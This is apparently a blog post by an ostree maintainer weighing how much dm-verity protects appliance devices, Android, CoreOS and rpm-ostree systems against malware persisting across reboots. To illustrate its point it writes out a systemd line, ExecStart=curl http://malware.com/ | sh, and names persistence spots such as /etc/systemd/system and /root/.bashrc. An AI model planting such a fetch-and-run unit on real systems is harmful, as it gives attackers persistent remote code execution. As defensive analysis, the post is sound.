On dm-verity and operating systems

TL;DR: I posit that dm-verity is most useful if one is making a true fixed purpose device that has extremely limited configuration. If one allows installing (unprivileged) software, the protection is weaker. And if it’s an intentional design feature of the OS to allow persistently installing privileged software, the value of dm-verity plummets significantly.

I am one of the upstream maintainers of the ostree project which is comparable with projects that do A/B style partition updates for operating systems, although it’s implemented at the filesystem and not the block level. There’s a a bit more on related projects here.

We got a request to investigate dm-verity, and I wrote down some preliminary thoughts. However, since then I spent a while thinking about it, and the benefits/drawbacks of dm-verity.

As I mention in the TL;DR section, I’m going to claim that dm-verity is best when the machine/device has limited configuration (config files should not be arbitrary code) and no ability to install software. For example, take a “WiFi camera”. These types of devices are obviously in the news for security issues.

What can dm-verity do for appliance-type systems?

Let’s say the device’s web interface has a flaw that allows an attacker on the local network to gain code execution; for example, command injection. However, the device manufacturer has properly implemented dm-verity, and every persistent mount point is read-only and verity protected. This is a significant barrier to the attacker maintaining persistence across a reboot. Concretely, one could unplug the camera, plug it into a secure network, allow it to download an OS update fixing the vulnerability, and have some confidence the exploit hasn’t persisted.

However, even that said, there are limits to the value here. dm-verity does not help you with the attacker monitoring the camera and spying on you; for example if it has a view of one of your offices, it could be recording your typed passwords. Attackers could use it to launch attacks on other devices on the network until it’s been rebooted. This article gives an example of nation-state level malware that lived “in the network”, not persistently on disk; in order to remove it the organization had to reboot everything at the same time.

Dm-verity on non-appliance systems

The ChromeOS trusted boot design docs have a section titled “Known weaknesses of verified boot”:

While verified boot can ensure that the system image (i.e. firmware, kernel, root file system) are protected against tampering by attackers, it can’t protect data that must inherently be modifiable by a running system. This includes user data, but also system-wide state such as system configuration (network, time zone, keyboard layout, etc.)…

One very interesting thing here is the fundamental difference between the original ChromeOS design (a device to just run Chrome i.e. web pages, no 3rd party non-browser software at all) and Android, which is obviously all about “apps”. Modern Android does use dm-verity; as I understand it the ChomeOS and Android projects are trying to merge some technologies, which includes the OS update mechanism.

On Android, apps are “unprivileged” or non root software, without Linux capabilities. But from a user perspective of course, applications can do quite a lot; similar to the WiFi camera case, attackers are likely perfectly happy injecting “unprivileged” Android applications that can monitor your location, microphone etc. Besides the well-known issues with Android devices not receiving security updates, there is a good example of a privilege escalation issue in Android called Cloak And Dagger; applications can exploit the accessibility framework to escalate their privileges, including full keystroke recording.

That said, persisting in an application does increase the chance an attacker could be detected. And if one suspects an Android device is compromised, dm-verity does provide value in that one can do a factory reset, and a bit like the WiFi camera scenario, do an OS update (before reinstalling apps), and have some confidence that the malware hasn’t persisted.

Dm-verity on full general purpose systems

A fully general purpose operating system needs to allow the installation of privileged code as well. An example of an OS that uses dm-verity and allows 3rd party code to execute with full (i.e. Linux CAP_SYS_ADMIN privileges) is CoreOS (yes, I know they renamed it to “Container Linux” but sorry, I think that’s silly, I’m going to keep calling it “CoreOS” 😃 ).

Installing a tool like Kubernetes on top of CoreOS requires it to be fully privileged to do its job (specifically the kubelet). Having a mechanism to install privileged software persistently means that same mechanism can be used by malware. While it’s true the malware doesn’t need to live in the /usr directory, unlike the non-configurable camera scenario, a software update and reboot isn’t going to fix things.

Also on CoreOS, attackers can write fully privileged unit files in /etc/systemd/system/, or the classic Unix things writing /root/.bashrc. These are all places where malware can persist across reboots. dm-verity in theory does make detection easier – but most system administrators are going to find it easier to simply re-provision their systems, and not look carefully at all of the files in /etc.

Ostree-style flexibility vs fixed block devices

Now let’s examine what an ostree-based system like Fedora Atomic Host does to help with preventing these types of hacks? Unfortunately, the answer is nothing! Atomic Host systems are equally general purpose. Since you can e.g. configure the system to set a HTTP proxy, and attacker could create a systemd unit file that runs ExecStart=curl http://malware.com/ | sh. Further, the OS data in /sysroot/ostree/repo isn’t verity protected; it’s just data in a filesystem, just like RPMs/debs etc. And for that matter, just like Docker overlay2 container files.

Why not implement dm-verity anyways? The answer is that I think it’s more valuable to have 3rd party software installation more tightly integrated with the host. We’re working on system containers for Kubernetes for example – these system containers have part of their configuration on the host, and configuration files down the line are going to be tracked by RPM. And outside of the container space, rpm-ostree supports “package layering”, which brings the best features of image update systems with the flexibility of package systems. You can use package layering to install privileged software like PAM modules, kernel drivers and the like. We recently landed the first experimental support for live system updates. This would be technically much harder if we operated at the block level, which dm-verity would force us into. Not to mention deep questions around signing of the bootable hash.

Package layering is crucial to provide flexiblity for “small scale” or “pet” machines. rpm-ostree allows you to use yum/apt/zypper style workflows,, and still get the benefits of image-like approaches. Such as known-good “base image”, transactional updates and “offline” updates. For example, with rpm-ostree you can uninstall your layered packages, and this will return the system to exactly to the “base image” in /usr.

Some people I’ve talked to about package layering don’t like the idea of still doing package installs per-machine. This is often the “large scale identical machine” cases – racks of identical servers (or at least ones that can use the same OS image), and “corporate standard build” laptops. In the large scale server case, organizations would prefer doing a “custom compose”, baking in their configuration to the images.

This goes back to a potential dm-verity scenario; in this model, we’d really want /etc to be immutable at runtime. Traditional files that need to be modified at runtime under /etc like /etc/resolv.conf would be a symlink into /run. Other “persistence vectors” like /usr/local and /root would need to be verity-protected too. The only writable, persistent filesystem should be /var. We’d also need to audit the operating system to make sure that no code can live in /var. A quick inspection shows there’d be work to do here; for example, I suspect /var/cache/ldconfig/aux-cache is used by the dynamic linker. There’s also /var/lib/alternatives. Hm, I notice my workstation has/var/spool/at – a cron job would be an excellent persistence vector too.

This sounds relatively doable. Get rid of things like at (Fedora Atomic Host already doesn’t have either the legacy cron or at – we suggest people use systemd timers). Moving that type of configuration underneath either /etc or /usr, which is what the “systemd config model” does, and those directories are read-only at runtime.

But going back to the high level – for general purpose operating systems, I’d take the flexibility of rpm-ostree’s dynamic package layering over having dm-verity for just a subset of privileged code. Being able to seamlessly install utilities on the host is very useful. We’ve even landed some recent work on replacing parts of the “base image”. I don’t want to build a new OS image every time I wanted to test a new version of docker or systemd, at least in a dev/test cycle.

I think there’s a spectrum here – with the “ostree model” enforcing read-only constraints around /usr, we are supporting iteration towards the more locked down “verity appliance” style devices. I know there are both ostree (and rpm-ostree) users today who are willing to drop some of the flexibility for increased security. If you’re one of those, please do follow the upstream issues linked above!

Concretely, you could build a tool that takes a kickstart configuration (your requested partitioning, time zone, etc.) plus generic %post style configuration (extra PAM tweaks, Docker registries), plus layered packages, plus container images, (and container runtime configuration?) and put all of that into a disk image, signed with dm-verity.

A challenge here is a lot of organizations are going to want branching. If one wants to update to a new version of Kubernetes/OpenShift, that would require a new image build. Organizations are going to want multiple active versions, to try out new OS builds in staging. Changing any configuration file that lives in /etc would also be a new image build. There are clearly files in /etc where a “heavyweight” change process could make sense; for example, the CA trust roots in /etc/pki.

Back to my original thesis, the dm-verity approach is best for IoT/appliance devices with truly limited configuration. As soon as you have any persistent place to write configuration/code that isn’t verity protected, its value drops.

One comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s